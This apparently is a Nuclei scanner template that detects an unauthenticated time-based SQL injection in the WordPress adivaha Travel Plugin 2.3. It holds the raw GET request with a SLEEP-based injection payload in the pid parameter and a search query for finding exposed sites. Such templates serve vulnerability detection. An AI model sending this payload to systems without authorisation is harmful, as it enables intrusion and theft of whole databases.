id: wp-adivaha-sqli

info:
  name: WordPress adivaha Travel Plugin 2.3 - SQL Injection
  author: theamanrawat
  severity: high
  description: |
    An unauthenticated Time-Based SQL injection found in adivaha Travel Plugin 2.3 allows a remote attacker to retrieve the contents of an entire database.
  reference:
    - https://wordpress.org/plugins/adiaha-hotel/
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/adiaha-hotel/"
  tags: sqli,adivaha,wordpress,wp,wp-plugin

http:
  - raw:
      - |
        @timeout: 25s
        GET /mobile-app/v3/?pid='+AND+(SELECT+6398+FROM+(SELECT(SLEEP(7)))zoQK)+AND+'Zbtn'='Zbtn&isMobile=chatbot HTTP/2
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - duration>=7
          - status_code == 200
          - contains(body, "adivaha")
        condition: and

# digest: 4b0a00483046022100b3a6c915a2cba4aa0cf4d49ea69f73504c90445b3f53b601f6527a9de5b2870c022100ca39b2fa5b1f556f4ae4c7c7a16655371c7272b8321f0d04280f68a70293ecd0:922c64590222798bb761d5b6d8e72950
